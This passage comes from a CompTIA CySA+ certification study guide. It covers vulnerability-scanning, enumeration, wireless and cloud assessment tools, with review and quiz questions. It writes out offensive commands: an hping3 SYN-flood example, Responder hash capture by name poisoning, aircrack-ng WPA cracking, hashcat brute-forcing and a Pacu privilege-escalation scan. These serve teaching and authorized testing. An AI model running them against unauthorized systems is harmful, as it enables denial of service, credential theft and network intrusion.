a way that business operations and processes are
interrupted. Therefore, the need to conduct these
activities during off-hours can also be a factor that
impedes the remediation of vulnerabilities.
• Degrading functionality: Some solutions
create more issues than they resolve. In some
cases, it may be impossible to implement a
mitigation because it would break mission-critical
applications or processes. The organization may
need to research an alternative solution.
• Legacy systems: Legacy systems are those that
are older and may be less secure than newer
systems. Some of these older systems are no longer
supported and are not receiving updates. In many
cases, organizations have legacy systems
performing critical operations and the enterprise
cannot upgrade those systems for one reason or
another. It could be that the current system
cannot be upgraded because it would be
disruptive to sales or marketing. Sometimes
politics prevents these upgrades. In some cases
the money is just not there for the upgrade. For
whatever reason, the inability to upgrade is an
inhibitor to remediation.
• Proprietary systems: In some cases, solutions
have been developed by the organization that do
not follow standards and are proprietary in
nature. In this case the organization is responsible
for updating the systems to address security
issues. Many times this does not occur. For these
types of systems, the upgrade path is even more
difficult because performing the upgrade is not
simply a matter of paying for the upgrade and
applying the upgrade. The work must be done by
the programmers in the organization that
developed the solution (if they are still around).
Obviously the inability to upgrade is an inhibitor
to remediation.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep practice test software.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 3-4 lists a reference of these key topics and the
page numbers on which each is found.
Table 3-4 Key Topics
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
asset criticality
passive vulnerability scanning
active vulnerability scanning
enumeration
true positive
false positive
true negative
false negative
configuration baseline
patching
hardening
compensating controls
risk acceptance
vulnerability feed
scope
credentialed scan
non-credentialed scan
external scan
internal scan
memorandum of understanding (MOU)
service-level agreement (SLA)
legacy systems
proprietary systems
REVIEW QUESTIONS
1. ____________________ describes the relative
value of an asset to the organization.
2. List at least one question that should be raised to
determine asset criticality.
3. Nessus Network Monitor is an example of a(n)
_____________ scanner.
4. Match the following terms with their definition.
5. ____________________ are security settings
that are required on devices of various types.
6. Place the following patch management life cycle
steps in order.
• Install the patches in the live environment.
• Determine the priority of the patches and
schedule the patches for deployment.
• Ensure that the patches work properly.
• Test the patches.
7. When you are encrypting sensitive data, you are
implementing a(n) _________________.
8. List at least two logical hardening techniques.
9. Match the following risk-handling techniques with
their definitions.
10. List at least one risk to scanning.
Chapter 4. Analyzing
Assessment Output
This chapter covers the following topics related
to Objective 1.4 (Given a scenario, analyze the
output from common vulnerability assessment
tools) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
• Web application scanner: Covers the OWASP
Zed Attack Proxy (ZAP), Burp Suite, Nikto, and
Arachni scanners
• Infrastructure vulnerability scanner: Covers
the Nessus, OpenVAS, and Qualys scanners
• Software assessment tools and techniques:
Explains static analysis, dynamic analysis, reverse
engineering, and fuzzing
• Enumeration: Describes Nmap, hping, active vs.
passive enumeration, and Responder
• Wireless assessment tools: Covers Aircrack-ng, Reaver, and oclHashcat
• Cloud infrastructure assessment tools:
Covers ScoutSuite, Prowler, and Pacu
When assessments are performed, the data gathered
must be analyzed. The format of the output generated by
the various tools used to perform the vulnerability
assessment may be intuitive, but in many cases it is not.
Analysts must be able to read and correctly interpret the
output to identify issues that may exist. This chapter is
dedicated to analyzing vulnerability assessment output.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these six self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 4-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 4-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a type of proactive
monitoring and uses external agents to run scripted
transactions against an application?
a. RUM
b. Synthetic transaction monitoring
c. Reverse engineering
d. OWASP
2. Which of the following is an example of a cloud-based vulnerability scanner?
a. OpenVAS
b. Qualys
c. Nikto
d. NESSUS
3. Which step in the software development life cycle
(SDLC) follows the design step?
a. Gather requirements
b. Certify/accredit
c. Develop
d. Test/validate
4. Which of the following is the process of discovering
and listing information?
a. Escalation
b. Discovery
c. Enumeration
d. Penetration
5. Which of the following is a set of command-line
tools you can use to sniff WLAN traffic?
a. hping3
b. Aircrack-ng
c. Qualys
d. Reaver
6. Which of the following is a data collection tool that
allows you to use longitudinal survey panels to
track and monitor the cloud environment?
a. Prowler
b. ScoutSuite
c. Pacu
d. Mikto
FOUNDATION TOPICS
WEB APPLICATION
SCANNER
Web vulnerability scanners focus on discovering
vulnerabilities in web applications. These tools can
operate in two ways: synthetic transaction monitoring or
real user monitoring. In synthetic transaction
monitoring, preformed (synthetic) transactions are
performed against the web application in an automated
fashion, and the behavior of the application is recorded.
In real user monitoring, real user transactions are
monitored while the web application is live.
Synthetic transaction monitoring, which is a type
of proactive monitoring, uses external agents to run
scripted transactions against a web application. This type
of monitoring is often preferred for websites and
applications. It provides insight into the application’s
availability and performance and warns of any potential
issue before users experience any degradation in
application behavior. For example, Microsoft’s System
Center Operations Manager (SCOM) uses synthetic
transactions to monitor databases, websites, and TCP
port usage.
In contrast, real user monitoring (RUM), which is a
type of passive monitoring, captures and analyzes every
transaction of every web application or website user.
Unlike synthetic transaction monitoring, which attempts
to gain performance insights by regularly testing
synthetic interactions, RUM cuts through the guesswork,
seeing exactly how users are interacting with the
application.
Many web application scanners are available. These tools
scan an application for common security issues with
cookie management, PHP scripts, SQL injections, and
other problems. Some examples of these tools are
covered in this section.
Burp Suite
The Burp Suite is a suite of tools, one of which can be
used for testing web applications. It can scan an
application for vulnerabilities and can also be used to
crawl an application (to discover content). This
commercial software is available for Windows, Linux,
and macOS. It can also be used for exploiting
vulnerabilities. For more information, see
https://portswigger.net/burp.
OWASP Zed Attack Proxy (ZAP)
The Open Web Application Security Project (OWASP)
produces an interception proxy called OWASP Zed
Attack Proxy (ZAP). It performs many of the same
functions as Burp, and so it also falls into the exploit
category. It can monitor the traffic between a client and a
server, crawl the application for content, and perform
vulnerability scans. For more information, see
https://owasp.org/www-project-zap/.
Nikto
Nikto is a vulnerability scanner that is dedicated to web
servers. It is designed for Linux but can be run in
Windows through a Perl interpreter. This tool is not
stealthy, but it is a fast scanner. Everything it does is
recorded in the target's logs. It generates a lot of
information, much of it normal or informational. It is a
command-line tool that is often run from within Kali
Linux, a distribution that comes preinstalled with more
than 300 penetration-testing programs. For more
information, see
https://tools.kali.org/information-gathering/nikto.
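As a simple illustration, a basic Nikto scan can be
launched against a single host; the target address here is
an assumption:

# Scan the web server at 192.168.1.10 on the default port (80)
nikto -h 192.168.1.10

# Scan an HTTPS site on port 443
nikto -h 192.168.1.10 -p 443 -ssl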
Arachni
Arachni is a Ruby framework for assessing the security
of a web application. It is often used by penetration
testers. It is open source, works with all major operating
systems (Windows, macOS, and Linux), and is
distributed via portable packages that allow for instant
deployment. Arachni can be used either at the command
line or via the web interface, shown in Figure 4-1.
Figure 4-1 Arachni
INFRASTRUCTURE
VULNERABILITY SCANNER
An infrastructure vulnerability scanner probes for a
variety of security weaknesses, including
misconfigurations, out-of-date software, missing
patches, and open ports. These solutions can be on
premises or cloud based.
Cloud-based vulnerability scanning is a service
performed from the vendor’s cloud and is a good
example of Software as a Service (SaaS). The benefits
here are the same as the benefits derived from any SaaS
offering: the subscriber does not have to provide
equipment, and the service makes no footprint in the
local network. Figure 4-2 shows a premises-based
approach to vulnerability scanning, and Figure 4-3
shows a cloud-based solution. In the premises-based
approach, all the hardware and/or software vulnerability
scanners and associated components are installed on the
client premises, while in the cloud-based approach, the
vulnerability management platform is hosted in the
cloud by the provider. Vulnerability scanners for external
vulnerability assessments are located at the solution
provider’s site, with additional scanners on the client
premises.
Figure 4-2 Premises-Based Scanning
Figure 4-3 Cloud-Based Scanning
The following are the advantages of the cloud-based
approach:
• Installation costs are low because there is no
installation and configuration for the client to
complete.
• Maintenance costs are low because there is only
one centralized component to maintain, and it is
maintained by the vendor (not the end client).
• Upgrades are included in a subscription.
• Costs are distributed among all customers.
• It does not require the client to provide onsite
equipment.
However, there is a considerable disadvantage to the
cloud-based approach: Whereas premises-based
deployments store data findings at the organization’s
site, in a cloud-based deployment, the data is resident
with the provider. This means the customer is dependent
on the provider to ensure the security of the vulnerability
data. Now let’s look at some specific tools.
Nessus
One of the most widely used vulnerability scanners is
Nessus Professional, a proprietary tool developed by
Tenable Network Security. It is free of charge for
personal use in a non-enterprise environment. By
default, Nessus Professional starts by listing at the top of
the output the issues found on a host that are rated with
the highest severity, as shown in Figure 4-4.
Figure 4-4 Example Nessus Output
For the computer scanned in Figure 4-4, you can see that
there is one high-severity issue (the default password for
a Firebird database located on the host), and there are
five medium-level issues, including two SSL certificates
that cannot be trusted and a remote desktop man-in-the-middle attack vulnerability. For more information, see
https://www.tenable.com/products/nessus.
OpenVAS
As you might suspect from the name, the OpenVAS tool
is open source. It was developed from the Nessus code
base and is available as a package for many Linux
distributions. The scanner is accompanied with a
regularly updated feed of network vulnerability tests
(NVT). It uses the Greenbone console, shown in Figure
4-5. For more information, see
https://www.openvas.org/.
Figure 4-5 OpenVAS
Qualys
Qualys is an example of a cloud-based vulnerability
scanner. Sensors are placed throughout the network, and
they upload data to the cloud for analysis. Sensors can be
implemented as dedicated appliances or as software
instances on a host. A third option is to deploy sensors as
images on virtual machines. For more information, see
https://www.qualys.com/.
SOFTWARE ASSESSMENT
TOOLS AND TECHNIQUES
Many organizations create software either for customers
or for their own internal use. When software is
developed, the earlier in the process security is
considered, the less it will cost to secure the software. It
is best for software to be secure by design. Secure coding
standards are practices that, if followed throughout the
software development life cycle (SDLC), help to
reduce the attack surface of an application.
In Chapter 9, “Software Assurance Best Practices,” you
will learn about the SDLC, a set of ordered steps to help
ensure that software is developed to enhance both
security and functionality. As a quick preview, the SDLC
steps are listed here:
Step 1. Plan/initiate project
Step 2. Gather requirements
Step 3. Design
Step 4. Develop
Step 5. Test/validate
Step 6. Release/maintain
Step 7. Certify/accredit
Step 8. Perform change management and
configuration management/replacement
This section concentrates on Steps 5 and 7, which are the
steps where testing of the software occurs. This testing is
covered in this chapter because it is a part of
vulnerability management. This testing or validation can
take many forms.
Static Analysis
Static code analysis is performed without the code
executing. Code review and testing must occur
throughout the entire SDLC and must identify bad
programming patterns, security misconfigurations,
functional bugs, and logic flaws. In the planning and
design phases, this includes architecture security reviews
and threat modeling. In the development phase, it
includes static source code analysis, manual code review,
static binary code analysis, and manual binary review.
Once an application is deployed, code review and testing
involve penetration testing, vulnerability scanning, and
fuzz testing.
Static code review can be done with scanning tools that
look for common issues. These tools can use a variety of
approaches to find bugs, including the following:
• Data flow analysis: This analysis looks at
runtime information while the software is in a
static state.
• Control flow graph: A graph of the components
and their relationships can be developed and used
for testing by focusing on the entry and exit points
of each component or module.
• Taint analysis: This analysis attempts to identify
variables that are tainted with user-controllable
input.
• Lexical analysis: This analysis converts source
code into tokens of information to abstract the
code and make it easier to manipulate for testing
purposes.
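By way of example, open-source scanners apply these
approaches from the command line. The following
invocations are a sketch, assuming a source tree at src/;
flawfinder performs lexical analysis of C/C++ code, and
bandit analyzes Python code:

# Lexical analysis of C/C++ sources for risky function calls
flawfinder src/

# Static analysis of Python code for common security issues
bandit -r src/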
Code review is the systematic investigation of the code
for security and functional problems. It can take many
forms, from simple peer review to formal code review.
There are two main types of reviews:
• Formal review: This is an extremely thorough,
line-by-line inspection, usually performed by
multiple participants using multiple phases. This
is the most time-consuming type of code review
but the most effective at finding defects.
• Lightweight: This type of code review is much
more cursory than a formal review. It is usually
done as a normal part of the development process.
It can happen in several forms:
• Pair programming: Two coders work side by
side, checking one another’s work as they go.
• Email: Code is emailed around to colleagues
for them to review when time permits.
• Over the shoulder: Coworkers review the
code while the author explains his or her
reasoning.
• Tool-assisted: Perhaps the most efficient
method, this method uses automated testing
tools.
While code review is most typically performed on in-house applications, it may be warranted in other
scenarios as well. For example, say that you are
contracting with a third party to develop a web
application to process credit cards. Considering the
sensitive nature of the application, it would not be
unusual for you to request your own code review to
assess the security of the product.
In many cases, more than one tool should be used in
testing an application. For example, an online banking
application that has had its source code updated should
undergo both penetration testing with accounts of
varying privilege levels and a code review of the critical
modules to ensure that no defects exist there.
Dynamic Analysis
Dynamic analysis is testing performed while the
software is running. This testing can be performed
manually or by using automated testing tools. There are
two general approaches to dynamic testing:
• Synthetic transaction monitoring: A type of
proactive monitoring, often preferred for websites
and applications. It provides insight into the
application’s availability and performance,
warning of any potential issue before users
experience any degradation in application
behavior. It uses external agents to run scripted
transactions against an application. For example,
Microsoft’s System Center Operations Manager
(SCOM) uses synthetic transactions to monitor
databases, websites, and TCP port usage.
• Real user monitoring (RUM): A type of
passive monitoring that captures and analyzes
every transaction of every application or website
user. Unlike synthetic monitoring, which attempts
to gain performance insights by regularly testing
synthetic interactions, RUM cuts through the
guesswork by analyzing exactly how your users
are interacting with the application.
Reverse Engineering
In 1990, the Institute of Electrical and Electronics
Engineers (IEEE) defined reverse engineering as “the
process of analyzing a subject system to identify the
system’s components and their interrelationships, and to
create representations of the system in another form or
at a higher level of abstraction,” where the “subject
system” is the end product of software development.
Reverse engineering techniques can be applied in several
areas, including the study of the security of in-house
software. In Chapter 16, “Applying the Appropriate
Incident Response Procedure,” you’ll learn how reverse
engineering is applied to the incident response
procedure. In Chapter 12, “Implementing Configuration
Changes to Existing Controls to Improve Security,” you’ll
learn how reverse engineering applies to the malware
analysis process. The techniques you will learn about in
those chapters can also be used to locate security issues
with in-house software.
Fuzzing
Fuzz testing, or fuzzing, involves injecting invalid or
unexpected input (sometimes called faults) into an
application to test how the application reacts. It is
usually done with a software tool that automates the
process. Inputs can include environment variables,
keyboard and mouse events, and sequences of API calls.
Figure 4-6 shows the logic of the fuzzing process.
Figure 4-6 Fuzz Testing
Two types of fuzzing can be used to identify susceptibility
to a fault injection attack:
• Mutation fuzzing: Involves changing the
existing input values (blindly)
• Generation-based fuzzing: Involves
generating the inputs from scratch, based on the
specification/format
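As a minimal sketch of mutation fuzzing, assume a local
test binary named ./parser, a known-good input file, and
the open-source mutation tool radamsa (all three names
are assumptions for illustration):

# Generate 100 mutated variants of a known-good input and watch for crashes
for i in $(seq 1 100); do
  radamsa sample.txt > fuzzed.txt      # blindly mutate the valid input
  ./parser fuzzed.txt || echo "nonzero exit on iteration $i"
done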
The following measures can help prevent fault injection
attacks:
• Implement fuzz testing to help identify problems.
• Adhere to safe coding and project management
practices.
• Deploy application-level firewalls.
ENUMERATION
Enumeration is the process of discovering and listing
information. Network enumeration is the process of
discovering pieces of information that might be helpful
in a network attack or compromise. There are several
techniques used to perform enumeration and several
tools that make the process easier for both testers and
attackers. Let’s take a look at these techniques and tools.
Nmap
While network scanning can be done with more blunt
tools, like ping, Nmap is stealthier and may be able to
perform its activities without setting off firewalls and
IDSs. It is valuable to note that while we are discussing
Nmap in the context of network scanning, this tool can
be used for many other operations, including performing
certain attacks. When used for scanning, it typically
locates the devices, locates the open ports on the devices,
and determines the OS on each host.
After performing Nmap scans with certain flags set in the
scan packets, security analysts (and hackers) can make
certain assumptions based on the responses received.
These flags are used to control the TCP connection
process and so are present only in those packets. Figure
4-7 shows a TCP header with the important flags circled.
Normally, flags are “turned on” as a result of the normal
TCP process, but a hacker can craft packets that set
whichever flags he wants to test.
Figure 4-7 TCP Header
Figure 4-7 shows these flags, among others:
• URG: Urgent pointer field significant
• ACK: Acknowledgment field significant
• PSH: Push function
• RST: Reset the connection
• SYN: Synchronize sequence numbers
• FIN: No more data from sender
Nmap exploits weaknesses with three scan types:
• Null scan: A Null scan is a series of TCP packets
that contain a sequence number of 0 and no set
flags. Because the Null scan does not contain any
set flags, it can sometimes penetrate firewalls and
edge routers that filter incoming packets with
particular flags. When such a packet is sent, two
responses are possible:
• No response: The port is open on the target.
• RST: The port is closed on the target.
Figure 4-8 shows the result of a Null scan using the
command nmap -sN. In this case, nmap received no
response but was unable to determine whether that was
because a firewall was blocking the port or the port was
closed on the target. Therefore, it is listed as
open|filtered.
Figure 4-8 Null Scan
• FIN scan: This type of scan sets the FIN bit.
When this packet is sent, two responses are
possible:
• No response: The port is open on the target.
• RST/ACK: The port is closed on the target.
Example 4-1 shows sample output of a FIN scan using
the command nmap -sF, with the -v included for
verbose output. Again, nmap received no response but
was unable to determine whether that was because a
firewall was blocking the port or the port was closed on
the target. Therefore, it is listed as open|filtered.
Example 4-1 FIN Scan Using nmap -sF
# nmap -sF -v 192.168.0.7
Starting nmap 3.81 at 2016-01-23 21:17 EDT
Initiating FIN Scan against 192.168.0.7 [1663 ports] at 21:17
The FIN Scan took 1.51s to scan 1663 total ports.
Host 192.168.0.7 appears to be up ... good.
Interesting ports on 192.168.0.7:
(The 1654 ports scanned but not shown below are in state: closed)
PORT     STATE         SERVICE
21/tcp   open|filtered ftp
22/tcp   open|filtered ssh
23/tcp   open|filtered telnet
79/tcp   open|filtered finger
110/tcp  open|filtered pop3
111/tcp  open|filtered rpcbind
514/tcp  open|filtered shell
886/tcp  open|filtered unknown
2049/tcp open|filtered nfs
MAC Address: 00:03:47:6D:28:D7 (Intel)
Nmap finished: 1 IP address (1 host up) scanned in 2.276 seconds
Raw packets sent: 1674 (66.9KB) | Rcvd: 1655 (76.1KB)
• XMAS scan: This type of scan sets the FIN, PSH,
and URG flags. When this packet is sent, two
responses are possible:
• No response: The port is open on the target.
• RST: The port is closed on the target.
Figure 4-9 shows the result of this scan, using the
command nmap -sX. In this case nmap received no
response but was unable to determine whether that was
because a firewall was blocking the port or the port was
closed on the target. Therefore, it is listed as
open|filtered.
Figure 4-9 XMAS Scan
Null, FIN, and XMAS scans all serve the same purpose,
to discover open ports and ports blocked by a firewall,
and differ only in the switch used. While there are many
more scan types and attacks that can be launched with
Nmap, these scan types are commonly used during
environmental reconnaissance testing to discover what a
hacker might discover, so that you can take steps to close
any gaps in security before the hacker gets there. For
more information on Nmap, see https://nmap.org/.
Host Scanning
Host scanning involves identifying the live hosts on a
network or in a domain namespace. Nmap and other
scanning tools (such as ScanLine and SuperScan) can be
used for this. Sometimes called a ping scan, a host scan
records responses to pings sent to every address in the
network. You can also combine a host scan with a port
scan by using the proper arguments to the command.
During environmental reconnaissance testing, you can
make use of these scanners to identify all live hosts. You
may discover hosts that shouldn’t be there. To execute
this scan from nmap, the command is nmap -sP
192.168.0.0-100, where 0-100 is the range of IP
addresses to be scanned in the 192.168.0.0 network.
Figure 4-10 shows an example of the output from this
command. This command’s output lists all devices that
are on. For each one, the MAC address is also listed.
Figure 4-10 Host Scan with Nmap
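The following sketch shows the same discovery scan
alongside a combined host-and-port scan; note that
newer Nmap releases spell the ping-scan option -sn,
though -sP is still accepted:

# Host discovery only (ping scan) across a /24 network
nmap -sn 192.168.0.0/24

# Host discovery plus a fast scan of the 100 most common ports
nmap -F 192.168.0.0/24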
hping
hping (and the newer version, hping3) is a command-line-oriented TCP/IP packet assembler/analyzer that
goes beyond simple ICMP echo requests. It supports
TCP, UDP, ICMP, and RAW-IP protocols and also has a
traceroute mode. The following is a subset of the
operations possible with hping:
• Firewall testing
• Advanced port scanning
• Network testing, using different protocols, TOS,
fragmentation
• Manual path MTU discovery
• Advanced traceroute, under all the supported
protocols
• Remote OS fingerprinting
• Remote uptime guessing
• TCP/IP stacks auditing
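For instance, two of these operations, firewall testing
and TCP-based traceroute, look like the following sketch;
the address and ports are assumptions:

# Send a single TCP ACK probe to port 80 to see whether a
# stateless filter passes unsolicited ACKs (firewall testing)
sudo hping3 -A -p 80 -c 1 192.168.1.1

# Traceroute using TCP SYN packets to port 443 instead of ICMP
sudo hping3 --traceroute -S -p 443 -c 3 192.168.1.1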
What is significant about hping is that it can be used to
create or assemble packets. Attackers use packet
assembly tools to create packets that allow them to
mount attacks. Testers can also use hping to create
malicious packets to assess the response of the network
defenses or to identify vulnerabilities that may exist.
A common attack is a DoS attack using what is called a
SYN flood. In this attack, the target is overwhelmed
with SYN packets whose SYN-ACK replies are never
acknowledged. The device answers each SYN packet
with a SYN-ACK. Because devices reserve memory for
the expected response to each SYN-ACK, and because
the attacker never answers, the target system eventually
runs out of memory, making it essentially a dead device.
This scenario is shown in Figure 4-11.
Figure 4-11 SYN Flood
Example 4-2 demonstrates how to deploy a SYN flood by
executing the hping command at the terminal.
Example 4-2 Deploying a SYN Flood with hping
$ sudo hping3 -i u1 -S -p 80 -c 10 192.168.1.1
HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0 data bytes

--- 192.168.1.1 hping statistic ---
10 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
The command in Example 4-2 sends TCP SYN packets to
192.168.1.1. Including sudo is necessary because hping3
creates raw packets for the task; for raw sockets/packets,
root privilege is necessary on Linux. The parts of the
command and the meaning of each are described as
follows:
• -S sets the SYN flag
• -p 80 means target port 80
• -i u1 means wait 1 microsecond between each packet
• -c 10 means send 10 packets
Were this a true attack, you would expect to see many
more packets sent; however, you can see how this tool
can be used to assess the likelihood that such an attack
would succeed. For more information, see
https://tools.kali.org/information-gathering/hping3.
Active vs. Passive
Chapter 3, “Vulnerability Management Activities,”
covered active and passive scanning. The concept of
active and passive enumeration is similar. Active
enumeration is when you send packets of some sort to
the network and then assess responses. An example of
this would be using nmap to send crafted packets that
interrogate the accessibility of various ports (port scan).
Passive enumeration does not send packets of any
type but captures traffic and makes educated
assumptions from the traffic. An example is using a
packet capture utility (sniffer) to look for malicious
traffic on the network.
Responder
Link-Local Multicast Name Resolution (LLMNR) and
NetBIOS Name Service (NBT-NS) are Microsoft
Windows components that serve as alternate methods of
host identification. Responder is a tool that can be used
for a number of things, among them answering NBT and
LLMNR name requests. By doing this it poisons the
service so that the victims communicate with the
adversary-controlled system. Once the name system is
compromised, Responder captures hashes and
credentials that are sent to the system after the name
services have been poisoned.
Figure 4-12 shows that after the target was convinced to
talk to Responder, it was able to capture the hash sent
for authentication, which could then be used to attempt
to crack the password.
Figure 4-12 Capturing Authentication Hashes with
Responder
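A minimal invocation looks like the following, assuming
a Kali host whose interface facing the target network is
eth0:

# Answer LLMNR/NBT-NS name requests on eth0 and log captured hashes
# (eth0 is an assumption; use the interface facing the target network)
sudo responder -I eth0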
WIRELESS ASSESSMENT
TOOLS
To assess wireless networks for vulnerabilities, you need
tools that can use wireless antennas and sensors to
capture and examine the wireless traffic. As a security
professional tasked with identifying wireless
vulnerabilities, you must also be familiar with the tools
used to compromise wireless networks. Let’s discuss
some of these tools.
Aircrack-ng
Aircrack-ng is a set of command-line tools you can use
to sniff wireless networks, among other things. Installers
for this tool are available for both Linux and Windows. It
is important to ensure that your device’s wireless chipset
and driver support this tool.
Aircrack-ng focuses on these areas of Wi-Fi security:
• Monitoring: Packet capture and export of data to
text files for further processing by third-party
tools
• Attacking: Replay attacks, deauthentication, fake
access points, and others via packet injection
• Testing: Checking Wi-Fi cards and driver
capabilities (capture and injection)
• Cracking: WEP and WPA PSK (WPA1 and 2)
As you can see, capturing wireless traffic is a small part
of what this tool can do. The command for capturing is
airodump-ng.
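A typical capture-then-crack workflow is sketched below,
assuming an adapter named wlan0 that supports
monitor mode and a target AP whose BSSID and channel
are known; the BSSID, capture file names, and wordlist
are assumptions:

# Put the adapter into monitor mode (creates an interface such as wlan0mon)
sudo airmon-ng start wlan0

# Capture traffic for the target AP on channel 6 into capture-01.cap
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

# Attempt to recover the WPA PSK from the capture with a wordlist
aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 capture-01.cap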
Figure 4-13 shows Aircrack-ng being used to attempt to
crack an encryption key. It attempted 1514 keys before
locating the correct one. For more information on
Aircrack-ng, see https://www.aircrack-ng.org/.
Figure 4-13 Aircrack-ng
Reaver
Reaver is both a package of tools and a command-line
tool within the package called reaver that is used to
attack Wi-Fi Protected Setup (WPS). Example 4-3 shows
the reaver command and its arguments.
Example 4-3 Reaver: Wi-Fi Protected Setup Attack
Tool
root@kali:~# reaver -h

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv or -vvv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [10]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.40]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -J, --timeout-is-nack           Treat timeout as NACK (DIR-300/320)
    -F, --ignore-fcs                Ignore frame checksum errors
    -w, --win7                      Mimic a Windows 7 registrar [False]
    -K, --pixie-dust                Run pixiedust attack
    -Z                              Run pixiedust attack

Example:
    reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
The Reaver package contains other tools as well.
Example 4-4 shows the arguments for the wash
command of the Wi-Fi Protected Setup Scan Tool. For
more information on Reaver, see
https://tools.kali.org/wireless-attacks/reaver.
Example 4-4 wash: Wi-Fi Protected Setup Scan Tool
root@kali:~# wash -h

Wash v1.6.5 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

Required Arguments:
    -i, --interface=<iface>              Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
    -c, --channel=<num>                  Channel to listen on [auto]
    -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
    -F, --ignore-fcs                     Ignore frame checksum errors
    -2, --2ghz                           Use 2.4GHz 802.11 channels
    -5, --5ghz                           Use 5GHz 802.11 channels
    -s, --scan                           Use scan mode
    -u, --survey                         Use survey mode [default]
    -a, --all                            Show all APs, even those without WPS
    -j, --json                           print extended WPS info as json
    -U, --utf8                           Show UTF8 ESSID (does not sanitize ESSID, dangerous)
    -h, --help                           Show help

Example:
    wash -i wlan0mon
oclHashcat
oclHashcat is a multi-hash cracker based on
general-purpose computing on graphics processing units
(GPGPU) that uses brute-force attacks. All versions have
now been updated and are simply called hashcat. In
GPGPU, the graphics processor is tasked with running
the algorithms that crack the hashes. The cracking of a
hash is shown in Figure 4-14.
Figure 4-14 oclHashcat
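Current hashcat usage is sketched below; the hash-type
value, file names, and mask are assumptions chosen for
illustration (-m 0 selects MD5):

# Dictionary attack (-a 0) against a file of MD5 hashes
hashcat -m 0 -a 0 hashes.txt wordlist.txt

# Brute-force mask attack (-a 3) trying eight lowercase letters
hashcat -m 0 -a 3 hashes.txt ?l?l?l?l?l?l?l?l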
CLOUD INFRASTRUCTURE
ASSESSMENT TOOLS
As moving assets to the cloud becomes the rule and not
the exception, identifying and mitigating vulnerabilities
in cloud environments steadily increases in importance.
There are several monitoring and attack tools with which
you should be familiar.
ScoutSuite
ScoutSuite is a data collection tool that allows you to
use what are called longitudinal survey panels to track
and monitor the cloud environment. It is open source
and utilizes APIs made available by the cloud provider.
The following cloud providers are currently
supported/planned:
• Amazon Web Services (AWS)
• Microsoft Azure
• Google Cloud Platform
• Alibaba Cloud (alpha)
• Oracle Cloud Infrastructure (alpha)
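Assuming Scout Suite has been installed (for example,
with pip install scoutsuite) and cloud credentials are
already configured locally, a run against a provider is a
single command; the profile and auth options shown are
assumptions:

# Audit an AWS environment using locally configured credentials
scout aws

# Audit an Azure subscription, authenticating via the Azure CLI
scout azure --cli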
Prowler
AWS Security Best Practices Assessment, Auditing,
Hardening and Forensics Readiness Tool, also called
Prowler, allows you to run reports of various types.
These reports list gaps found between your practices and
best practices of AWS as stated in CIS Amazon Web
Services Foundations Benchmark 1.1.
Figure 4-15 shows partial sample report results. Notice
that the results are color coded to categorize any gaps
found.
Figure 4-15 Prowler
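The following is a sketch of running Prowler (version 2
syntax) from a host with AWS credentials configured; the
group name is one of Prowler's published check groups:

# Run all checks against the default AWS profile and region
./prowler

# Run only the identity and access management checks (CIS section 1)
./prowler -g group1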
Pacu
Exploit frameworks are packages of tools that provide a
bed for creating and launching attacks of various types.
One of the more famous of these is Metasploit. Pacu is
an exploit framework used to assess and attack AWS
cloud environments. Using plug-in modules, it assists an
attacker in
• Enumeration
• Privilege escalation
• Data exfiltration
• Service exploitation
• Log manipulation
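Pacu is driven from an interactive shell. The following
sketch assumes Pacu has been cloned and installed and
an AWS session has already been created; the module
name comes from Pacu's public module list:

# Start the Pacu shell from the cloned repository
python3 pacu.py

# Inside the Pacu shell, enumerate possible privilege-escalation paths
run iam__privesc_scan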
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
